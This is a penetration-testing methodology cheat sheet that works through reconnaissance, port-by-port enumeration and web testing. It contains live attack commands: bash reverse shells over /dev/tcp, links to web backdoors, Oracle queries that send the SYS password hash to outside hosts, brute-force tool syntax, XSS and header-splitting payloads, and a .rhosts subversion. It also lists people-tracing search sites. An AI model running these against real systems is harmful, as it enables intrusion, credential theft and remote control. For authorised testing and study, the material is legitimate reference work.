Penetration

Penetration testing methodology

http://www.0daysecurity.com/penetration-testing/penetration.html

  • Discovery & Probing

  • Enumeration

  • Network Footprinting

  • Password Cracking

  • Voip Security

  • Vulnerability Assesment

  • Wireless Penetration

  • General Penetration

Discovery & Probing

Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS’s respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
Default Port Lists

Windows *nix

Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific
General Enumeration Tools
nmap

nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results nmap -A -sS -PN -n –script:all ip_address –reason grep “appears to be up” nmap_saved_filename | awk -F( ‘{print $2}’ | awk -F) ‘{print $1}’ > ip_list

netcat

nc -v -n IP_Address port nc -v -w 2 -z IP_Address port_range/port_number

amap

amap -bqv 192.168.1.1 80 amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] …]

xprobe2

xprobe2 192.168.1.1

sinfp

./sinfp.pl -i -p

nbtscan

nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)

hping

hping ip_address

scanrand

scanrand ip_address:all

unicornscan

unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:’ ] IP_ADDRESS/ CIDR_NET_MASK: S-E

netenum

netenum network/netmask timeout

fping fping -a -d hostname/ (Network/Subnet_Mask)

Firewall Specific Tools
firewalk

firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]

ftester

host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log

Active Hosts

Open TCP Ports Closed TCP Ports Open UDP Ports Closed UDP Ports Service Probing

SMTP Mail Bouncing Banner Grabbing

Other HTTP

Commands

JUNK / HTTP/1.0 HEAD / HTTP/9.3 OPTIONS / HTTP/1.0 HEAD / HTTP/1.0

Extensions

WebDAV ASP.NET Frontpage OWA IIS ISAPI PHP OpenSSL

HTTPS

Use stunnel to encapsulate traffic.

SMTP POP3 FTP

If banner altered, attempt anon logon and execute: ‘quote help’ and ‘syst’ commands.

ICMP Responses

Type 3 (Port Unreachable) Type 8 (Echo Request) Type 13 (Timestamp Request) Type 15 (Information Request) Type 17 (Subnet Address Mask Request) Responses from broadcast address

Source Port Scans

TCP/UDP 53 (DNS) TCP 20 (FTP Data) TCP 80 (HTTP) TCP/UDP 88 (Kerberos)

Firewall Assessment

Firewalk TCP/UDP/ICMP responses

OS Fingerprint

Enumeration

FTP port 21 open
Fingerprint server

telnet ip_address 21 (Banner grab) Run command ftp ip_address ftp@example.com Check for anonymous access

ftp ip_addressUsername: anonymous OR anonPassword: any@email.com

Password guessing

Hydra brute force medusa Brutus

Examine configuration files

ftpusers ftp.conf proftpd.conf

MiTM

pasvagg.pl

SSH port 22 open
Fingerprint server

telnet ip_address 22 (banner grab) scanssh

scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

Password guessing

ssh root@ip_address guess-who

./b -l username -h ip_address -p 22 -2 < password_file_location

Hydra brute force brutessh Ruby SSH Bruteforcer

Examine configuration files

ssh_config sshd_config authorized_keys ssh_known_hosts .shosts

SSH Client programs

tunnelier winsshd putty winscp

Telnet port 23 open
Fingerprint server
telnet ip_address

Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster

telnetfp

Password Attack

Common passwords Hydra brute force Brutus telnet -l “-froot” hostname (Solaris 10+)

Examine configuration files

/etc/inetd.conf /etc/xinetd.d/telnet /etc/xinetd.d/stelnet

Sendmail Port 25 open
Fingerprint server

telnet ip_address 25 (banner grab)

Mail Server Testing
Enumerate users

VRFY username (verifies if username exists - enumeration of accounts) EXPN username (verifies if username is valid - enumeration of accounts)

Mail Spoof Test

HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT

Mail Relay Test

HELO anything

Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain> Unknown domain - mail from: <user@unknown_domain> Domain not present - mail from: <user@localhost> Domain not supplied - mail from: <user>

Source address omission - mail from: <> rcpt to: <nobody@recipient_domain> Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>

Use double quotes - mail from: <user@domain> rcpt to: <”user@recipent-domain”>

User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>

Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>

Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>

Examine Configuration Files

sendmail.cf submit.cf

DNS port 53 open
Fingerprint server/ service
host

host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.

nslookup

nslookup [ -option … ] [ host-to-find | - [ server ]]

dig

dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt… ]

whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup

DNS Enumeration
Bile Suite

perl BiLE.pl [website] [project_name] perl BiLE-weigh.pl [website] [input file] perl vet-IPrange.pl [input file] [true domain file] [output file] <range> perl vet-mx.pl [input file] [true domain file] [output file] perl exp-tld.pl [input file] [output file] perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names] perl qtrace.pl [ip_address_file] [output_file] perl jarf-rev [subnetblock] [nameserver]

txdns

txdns -rt -t domain_name txdns -x 50 -bb domain_name txdns –verbose -fm wordlist.dic –server ip_address -rr SOA domain_name -h c: hostlist.txt

Examine Configuration Files

host.conf resolv.conf named.conf

TFTP port 69 open
TFTP Enumeration

tftp ip_address PUT local_file tftp ip_address GET conf.txt (or other files) Solarwinds TFTP server tftp – i <IP> GET /etc/passwd (old Solaris)

TFTP Bruteforcing

TFTP bruteforcer Cisco-Torch

Finger Port 79 open
User enumeration

finger ‘a b c d e f g h’ @example.com finger admin@example.com finger user@example.com finger 0@example.com finger .@example.com finger **@example.com finger test@example.com finger @example.com

Command execution

finger “|/bin/id@example.com" finger "|/bin/ls -a /@example.com

Finger Bounce

finger user@host@victim finger @internal@external

Web Ports 80, 8080 etc. open
Fingerprint server

Telnet ip_address port Firefox plugins

All

firecat

Specific

add n edit cookies asnumber header spy live http headers shazou web developer

Crawl website

lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source httprint Metagoofil

metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

Web Directory enumeration
Nikto

nikto [-h target] [options]

DirBuster Wikto Goolag Scanner

Vulnerability Assessment
Manual Tests

Default Passwords Install Backdoors

ASP

http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt

Assorted

http://michaeldaw.org/projects/web-backdoor-compilation/ http://open-labs.org/hacker_webkit02.tar.gz

Perl

http://home.arcor.de/mschierlm/test/pmsh.pl http://pentestmonkey.net/tools/perl-reverse-shell/ http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz

PHP

http://php.spb.ru/remview/ http://pentestmonkey.net/tools/php-reverse-shell/ http://pentestmonkey.net/tools/php-findsock-shell/

Python

http://matahari.sourceforge.net/

TCL

http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes

Bash Connect Back Shell
GnuCitizen

Atttack Box: nc -l -p Port -vvv

Victim: $ exec 5<>/dev/tcp/IP_Address/Port

Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done

Neohapsis

Atttack Box: nc -l -p Port -vvv

Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin

Victim: $ exec 1>&0 # Next we copy stdin to stdout

Victim: $ exec 2>&0 # And finally stdin to stderr

Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0

Method Testing
nc IP_Adress Port

HEAD / HTTP/1.0 OPTIONS / HTTP/1.0 PROPFIND / HTTP/1.0 TRACE / HTTP/1.1 PUT http://Target_URL/FILE_NAME POST http://Target_URL/FILE_NAME HTTP/1.x

Upload Files
curl

curl -u <username:password> -T file_to_upload <Target_URL> curl -A “Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)” <Target_URL>

put.pl

put.pl -h target -r /remote_file_name -f local_file_name

webdav

cadaver

View Page Source

Hidden Values Developer Remarks Extraneous Code Passwords!

Input Validation Checks
NULL or null

Possible error messages returned.

‘ , “ , ; , <!

Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.

– , = , + , “

Used to craft SQL Injection queries.

‘ , &, ! , ¦ , < , >

Used to find command execution vulnerabilities.

“><script>alert(1)</script>

Basic Cross-Site Scripting Checks.

%0d%0a
Carriage Return (%0d) Line Feed (%0a)

HTTP Splitting

language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>

i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>

Cache Poisoning

language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>

%7f , %ff

byte-length overflows; maximum 7- and 8-bit values.

-1, other

Integer and underflow vulnerabilities.

%n , %x , %s

Testing for format string vulnerabilities.

../

Directory Traversal Vulnerabilities.

% , _, *

Wildcard characters can sometimes present DoS issues or information disclosure.

Ax1024+

Overflow vulnerabilities.

Automated table and column iteration
orderby.py

./orderby.py www.site.com/index.php?id=

d3sqlfuzz.py

./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE–

Vulnerability Scanners

Acunetix Grendelscan NStealth Obiwan III w3af

Specific Applications/ Server Tools
Domino
dominoaudit

dominoaudit.pl [options] -h <IP>

Joomla
cms_few

./cms.py <site-name>

joomsq

./joomsq.py <IP>

joomlascan

./joomlascan.py <site> <options> [options i.e. -p/-proxy <host:port> : Add proxy support -404 : Don’t show 404 responses]

joomscan

./joomscan.py -u “www.site.com/joomladir/” -o site.txt -p 127.0.0.1:80

jscan

jscan.pl -f hostname (shell.txt required)

aspaudit.pl

asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)

Vbulletin
vbscan.py

vbscan.py <host> <port> -v vbscan.py -update

ZyXel

zyxel-bf.sh snmpwalk

snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2

snmpget

snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0

Proxy Testing

Burpsuite Crowbar Interceptor Paros Requester Raw Suru WebScarab

Examine configuration files
Generic

Examine httpd.conf/ windows config files

JBoss
JMX Console http://<IP>:8080/jmxconcole/

War File

Joomla

configuration.php diagnostics.php joomla.inc.php config.inc.php

Mambo

configuration.php config.inc.php

Wordpress

setup-config.php wp-config.php

ZyXel

/WAN.html (contains PPPoE ISP password) /WLAN_General.html and /WLAN.html (contains WEP key) /rpDyDNS.html (contains DDNS credentials) /Firewall_DefPolicy.html (Firewall) /CF_Keyword.html (Content Filter) /RemMagWWW.html (Remote MGMT) /rpSysAdmin.html (System) /LAN_IP.html (LAN) /NAT_General.html (NAT) /ViewLog.html (Logs) /rpFWUpload.html (Tools) /DiagGeneral.html (Diagnostic) /RemMagSNMP.html (SNMP Passwords) /LAN_ClientList.html (Current DHCP Leases) Config Backups

/RestoreCfg.html /BackupCfg.html Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings

ZyXEL Config Reader

Examine web server logs
c:winntsystem32LogfilesW3SVC1

awk -F “ “ ‘{print $3,$11} filename | sort | uniq

References
White Papers

Cross Site Request Forgery: An Introduction to a Common Web Application Weakness Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity Blind Security Testing - An Evolutionary Approach Command Injection in XML Signatures and Encryption Input Validation Cheat Sheet SQL Injection Cheat Sheet

Books

Hacking Exposed Web 2.0 Hacking Exposed Web Applications The Web Application Hacker’s Handbook

Exploit Frameworks
Brute-force Tools

Acunetix

Metasploit w3af

Portmapper port 111 open
rpcdump.py

rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)

rpcinfo

rpcinfo [options] IP_Address

NTP Port 123 open
NTP Enumeration

ntpdc -c monlist IP_ADDRESS ntpdc -c sysinfo IP_ADDRESS ntpq

host hostname ntpversion readlist version

Examine configuration files

ntp.conf

NetBIOS Ports 135-139,445 open
NetBIOS enumeration
Enum

enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>

Null Session
net use \192.168.1.1ipc$ “” /u:””

net view \ip_address Dumpsec

Smbclient

smbclient -L //server/share password options

Superscan

Enumeration tab.

user2sid/sid2user Winfo

NetBIOS brute force

Hydra Brutus Cain & Abel getacct NAT (NetBIOS Auditing Tool)

Examine Configuration Files

Smb.conf lmhosts

SNMP port 161 open
Default Community Strings

public private cisco

cable-docsis ILMI

MIB enumeration
Windows NT

.1.3.6.1.2.1.1.5 Hostnames .1.3.6.1.4.1.77.1.4.2 Domain Name .1.3.6.1.4.1.77.1.2.25 Usernames .1.3.6.1.4.1.77.1.2.3.1.1 Running Services .1.3.6.1.4.1.77.1.2.27 Share Information

Solarwinds MIB walk Getif snmpwalk

snmpwalk -v <Version> -c <Community string> <IP>

Snscan Applications

ZyXel

snmpget -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2.6.0 snmpwalk -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2

SNMP Bruteforce
onesixtyone

onesixytone -c SNMP.wordlist <IP>

cat

./cat -h <IP> -w SNMP.wordlist

Solarwinds SNMP Brute Force ADMsnmp

Examine SNMP Configuration files

snmp.conf snmpd.conf snmp-config.xml

LDAP Port 389 Open
ldap enumeration
ldapminer

ldapminer -h ip_address -p port (not required if default) -d

luma

Gui based tool

ldp

Gui based tool

openldap

ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs…] ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file] ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn] ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file] ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

ldap brute force
bf_ldap

bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)

K0ldS LDAP_Brute.pl

Examine Configuration Files
General

containers.ldif ldap.cfg ldap.conf ldap.xml ldap-config.xml ldap-realm.xml slapd.conf

IBM SecureWay V3 server

V3.sas.oc

Microsoft Active Directory server

msadClassesAttrs.ldif

Netscape Directory Server 4

nsslapd.sas_at.conf nsslapd.sas_oc.conf

OpenLDAP directory server

slapd.sas_at.conf slapd.sas_oc.conf

Sun ONE Directory Server 5.1

75sas.ldif

PPTP/L2TP/VPN port 500/1723 open
Enumeration

ike-scan ike-probe

Brute-Force

ike-crack

Reference Material

PSK cracking paper SecurityFocus Infocus Scanning a VPN Implementation

Modbus port 502 open

modscan

rlogin port 513 open
Rlogin Enumeration
Find the files

find / -name .rhosts locate .rhosts

Examine Files

cat .rhosts

Manual Login

rlogin hostname -l username rlogin <IP>

Subvert the files

echo ++ > .rhosts

Rlogin Brute force

Hydra

rsh port 514 open
Rsh Enumeration

rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

Rsh Brute Force

rsh-grind Hydra medusa

SQL Server Port 1433 1434 open
SQL Enumeration

piggy SQLPing

sqlping ip_address/hostname

SQLPing2 SQLPing3 SQLpoke SQL Recon SQLver

SQL Brute Force
SQLPAT

sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack

SQL Dict SQLAT Hydra SQLlhf ForceSQL

Citrix port 1494 open
Citrix Enumeration

Default Domain Published Applications

./citrix-pa-scan {IP_address/file | - | random} [timeout] citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]

Citrix Brute Force

bforce.js connect.js Citrix Brute-forcer Reference Material

Hacking Citrix - the legitimate backdoor Hacking Citrix - the forceful way

Oracle Port 1521 Open
Oracle Enumeration

oracsec Repscan Sidguess Scuba DNS/HTTP Enumeration

SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME=’SYS’)||’.vulnerabilityassessment.co.uk’) FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E=’SYS’)||’.vulnerabilityassessment.co.uk’) FROM DUAL

SQL> select utl_http.request(’http://gladius:5500/’||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME=’SYS’)) from dual;

WinSID Oracle default password list TNSVer

tnsver host [port]

TCP Scan Oracle TNSLSNR

Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]

TNSCmd

perl tnscmd.pl -h ip_address perl tnscmd.pl version -h ip_address perl tnscmd.pl status -h ip_address perl tnscmd.pl -h ip_address –cmdsize (40 - 200)

LSNrCheck Oracle Security Check (needs credentials) OAT

sh opwg.sh -s ip_address opwg.bat -s ip_address sh oquery.sh -s ip_address -u username -p password -d SID OR c:oquery -s ip_address -u username -p password -d SID

OScanner

sh oscanner.sh -s ip_address oscanner.exe -s ip_address sh reportviewer.sh oscanner_saved_file.xml reportviewer.exe oscanner_saved_file.xml

NGS Squirrel for Oracle Service Register

Service-register.exe ip_address

PLSQL Scanner 2008

Oracle Brute Force
OAK

ora-getsid hostname port sid_dictionary_list ora-auth-alter-session host port sid username password sql ora-brutesid host port start ora-pwdbrute host port sid username password-file ora-userenum host port sid userlistfile ora-ver -e (-f -l -a) host port

breakable (Targets Application Server Port)

breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose

SQLInjector (Targets Application Server Port)

sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle

Check Password orabf

orabf [hash]:[username] [options]

thc-orakel

Cracker Client Crypto

DBVisualisor

Sql scripts from pentest.co.uk Manual sql input of previously reported vulnerabilties

Oracle Reference Material

Understanding SQL Injection SQL Injection walkthrough SQL Injection by example Advanced SQL Injection in Oracle databases Blind SQL Injection SQL Cheatsheets

NFS Port 2049 open
NFS Enumeration

showmount -e hostname/ip_address mount -t nfs ip_address:/directory_found_exported /local_mount_point

NFS Brute Force

Interact with NFS share and try to add/delete Exploit and Confuse Unix

Examine Configuration Files

/etc/exports /etc/lib/nfs/xtab

Compaq/HP Insight Manager Port 2301,2381open
HP Enumeration
Authentication Method

Host OS Authentication Default Authentication

Default Passwords

Wikto Nstealth

HP Bruteforce

Hydra Acunetix

Examine Configuration Files

path.properties mx.log CLIClientConfig.cfg database.props pg_hba.conf jboss-service.xml .namazurc

MySQL port 3306 open
Enumeration

nmap -A -n -p3306 <IP Address> nmap -A -n -PN –script:ALL -p3306 <IP Address> telnet IP_Address 3306 use test; select * from test; To check for other DB’s – show databases

Administration

MySQL Network Scanner MySQL GUI Tools mysqlshow mysqlbinlog

Manual Checks
Default usernames and passwords

username: root password: testing

mysql -h <Hostname> -u root mysql -h <Hostname> -u root mysql -h <Hostname> -u root@localhost mysql -h <Hostname> mysql -h <Hostname> -u “”@localhost

Configuration Files
Operating System
windows

config.ini my.ini

windowsmy.ini winntmy.ini

<InstDir>/mysql/data/

unix
my.cnf

/etc/my.cnf /etc/mysql/my.cnf /var/lib/mysql/my.cnf ~/.my.cnf /etc/my.cnf

Command History

~/.mysql.history

Log Files

connections.log update.log common.log

To run many sql commands at once – mysql -u username -p < manycommands.sql MySQL data directory (Location specified in my.cnf)

Parent dir = data directory mysql test information_schema (Key information in MySQL)

Complete table list – select table_schema,table_name from tables; Exact privileges – select grantee, table_schema, privilege_type FROM schema_privileges; File privileges – select user,file_priv from mysql.user where user=’root’; Version – select version(); Load a specific file – SELECT LOAD_FILE(‘FILENAME’);

SSL Check
mysql> show variables like ‘have_openssl’;

If there’s no rows returned at all it means the the distro itself doesn’t support SSL connections and probably needs to be recompiled. If its disabled it means that the service just wasn’t started with ssl and can be easily fixed.

Privilege Escalation
Current Level of access

mysql>select user(); mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user=’OUTPUT OF select user()’;

Access passwords

mysql> use mysql mysql> select user,password from user;

Create a new user and grant him privileges

mysql>create user test identified by ‘test’; mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on . to mysql identified by ‘mysql’ WITH GRANT OPTION;

Break into a shell

mysql> ! cat /etc/passwd mysql> ! bash

SQL injection
mysql-miner.pl

mysql-miner.pl http://target/ expected_string database

http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

References.
Design Weaknesses

MySQL running as root Exposed publicly on Internet

http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0

RDesktop port 3389 open
Rdesktop Enumeration

Remote Desktop Connection

Rdestop Bruteforce
TSGrinder

tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address

Tscrack

Sybase Port 5000+ open
Sybase Enumeration

sybase-version ip_address from NGS

Sybase Vulnerability Assessment
Use DBVisualiser
Sybase Security checksheet

Copy output into excel spreadsheet Evaluate mis-configured parameters

Manual sql input of previously reported vulnerabilties

Advanced SQL Injection in SQL Server More Advanced SQL Injection

NGS Squirrel for Sybase

SIP Port 5060 open
SIP Enumeration
netcat

nc IP_Address Port

sipflanker

python sipflanker.py 192.168.1-254

Sipscan smap

smap IP_Address/Subnet_Mask smap -o IP_Address/Subnet_Mask smap -l IP_Address

SIP Packet Crafting etc.
sipsak

Tracing paths: - sipsak -T -s sip:usernaem@domain Options request:- sipsak -vv -s sip:username@domain Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain

siprogue

SIP Vulnerability Scanning/ Brute Force
tftp bruteforcer

Default dictionary file ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes

VoIPaudit SiVuS

Examine Configuration Files

SIPDefault.cnf asterisk.conf sip.conf phone.conf sip_notify.conf <Ethernet address>.cfg 000000000000.cfg phone1.cfg sip.cfg etc. etc.

VNC port 5900^ open
VNC Enumeration
Scans

5900^ for direct access.5800 for HTTP access.

VNC Brute Force
Password Attacks
Remote
Password Guess

vncrack

Password Crack

vncrack Packet Capture

Phosshttp://www.phenoelit.de/phoss

Local
Registry Locations

HKEY_CURRENT_USERSoftwareORLWinVNC3 HKEY_USERS.DEFAULTSoftwareORLWinVNC3

Decryption Key

0x238210763578887

Exmine Configuration Files

.vnc /etc/vnc/config $HOME/.vnc/config /etc/sysconfig/vncservers /etc/vnc.conf

X11 port 6000^ open
X11 Enumeration

List open windows Authentication Method

Xauth Xhost

X11 Exploitation
xwd

xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm

Keystrokes

Received Transmitted

Screenshots xhost +

Examine Configuration Files

/etc/Xn.hosts /usr/lib/X11/xdm

Search through all files for the command “xhost +” or “/usr/bin/X11/xhost +”

/usr/lib/X11/xdm/xsession /usr/lib/X11/xdm/xsession-remote /usr/lib/X11/xdm/xsession.0 /usr/lib/X11/xdm/xdm-config

DisplayManager*authorize:on

Tor Port 9001, 9030 open
Tor Node Checker

Ip Pages Kewlio.net

nmap NSE script

Jet Direct 9100 open

hijetta

Network Footprinting

Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.

Whois is widely used for querying authoritative registries/ databases to discover the owner of a domain name, an IP address, or an autonomous system number of the system you are targeting.
Authoratitive Bodies

IANA - Internet Assigned Numbers Authority ICANN - Internet Corporation for Assigned Names and Numbers. NRO - Number Resource Organisation RIR - Regional Internet Registry

AFRINIC - African Network Information Centre APNIC - Asia Pacific Network Information Centre

National Internet Registry

APJII CNNIC JPNIC KRNIC TWNIC VNNIC

ARIN - American Registry for Internet Numbers LACNIC - Latin America & Caribbean Network Information Centre RIPE - Reseaux IP Européens—Network Coordination Centre

Websites
Central Ops

Domain Dossier Email Dossier

DNS Stuff

Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.

Fixed Orbit

Autonomous System lookups and other online tools available.

Geektools IP2Location

Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.

Kartoo

Metasearch engine that visually presents its results.

MyIPNeighbors.com

Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution

Netcraft

Online search tool allowing queries for host information.

Robtex

Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed. Note: - Can be unreliable with old entries (Use CentralOps to verify)

Traceroute.org

Website listing a large number links to online traceroute resources.

Wayback Machine

Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

Whois.net

Tools

Cheops-ng Country whois Domain Research Tool Firefox Plugins

AS Number Shazou Firecat Suite

Gnetutil Goolag Scanner Greenwich Maltego GTWhois Sam Spade Smart whois SpiderFoot

Internet Search
General Information

Web Investigator Tracesmart Friends Reunited Ebay - profiles etc.

Financial

EDGAR - Company information, including real-time filings. US Google Finance - General Finance Portal Hoovers - Business Intelligence, Insight and Results. US and UK Companies House UK Land Registry UK

Phone book/ Electoral Role Information
123people

http://www.123people.co.uk/s/firstname+lastname/world

192.com

Electoral Role Search. UK

411

Online White Pages and Yellow Pages. US

Abika

Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US

